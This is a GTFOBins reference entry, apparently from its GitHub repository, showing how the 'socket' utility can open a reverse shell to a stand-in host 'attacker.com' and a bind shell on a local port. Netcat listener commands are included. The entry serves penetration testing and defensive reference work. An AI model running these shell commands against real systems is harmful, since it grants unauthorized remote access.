GTFOBins.github.io/_gtfobins/socket.md
Andrea Cardaci 4baad5b113 Add socket
This supersedes and close #345.
2022-12-16 22:57:00 +01:00

403 B

function
reverse-shell bind-shell
description code
Run `nc -l -p 12345` on the attacker box to receive the shell. RHOST=attacker.com RPORT=12345 socket -qvp '/bin/sh -i' $RHOST $RPORT
description code
Run `nc target.com 12345` on the attacker box to connect to the shell. LPORT=12345 socket -svp '/bin/sh -i' $LPORT